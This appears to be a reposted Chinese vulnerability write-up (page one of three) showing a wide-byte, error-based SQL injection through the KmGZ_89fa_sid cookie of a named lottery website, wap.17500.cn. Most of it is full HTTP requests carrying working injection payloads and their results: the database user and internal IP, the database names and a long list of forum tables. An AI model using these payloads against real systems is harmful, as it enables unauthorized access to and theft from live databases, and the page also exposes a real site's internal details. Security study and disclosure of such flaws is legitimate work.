欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

乐彩网某站Cookie宽字节注入

来源:本站整理 作者:佚名 时间:2015-05-08 TAG: 我要投稿

wap.17500.cn
宽字节注入:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive
cookie中的KmGZ_89fa_sid参数

user: bbs@192.168.100.107
接下来看看库:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

三个库:

information_schema
bbs
test
获取bbs库中的表:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,table_name,0x5e5e5e) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

378张表,只能叫burp帮忙跑跑:

baidusubmit_sitemap
baidusubmit_urlstat
collect_banlog
collect_cplog
collect_errorlog
collect_illegallog
collect_logpos
collect_modcplog
collect_modslog
collect_ratelog
common_addon
common_admincp_cmenu
common_admincp_group
common_admincp_member
common_admincp_perm
common_admincp_session
common_admingroup
common_adminnote
common_advertisement
common_advertisement_custom
common_banned
common_block
common_block_favorite
common_block_item
common_block_item_data
common_block_permission
common_block_pic
common_block_style
common_block_xml
common_cache
common_card
common_card_log
common_card_type
common_connect_guest
common_credit_log
common_credit_log_field
common_credit_rule
common_credit_rule_log
common_credit_rule_log_field
common_cron
common_devicetoken
common_district
common_diy_data
common_domain
common_failedip
common_failedlogin
common_friendlink
common_grouppm
common_invite
common_limit_ips
common_limit_login
common_limit_time
common_magic
common_magiclog
common_mailcron
common_mailqueue
common_member
common_member_action_log
common_member_connect
common_member_count
common_member_crime
common_member_field_forum
common_member_field_home
common_member_forum_buylog
common_member_grouppm
common_member_log
common_member_magic
common_member_medal
common_member_newprompt
common_member_profile
common_member_profile
common_member_profile_setting
common_member_security
common_member_secwhite
common_member_stat_field

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载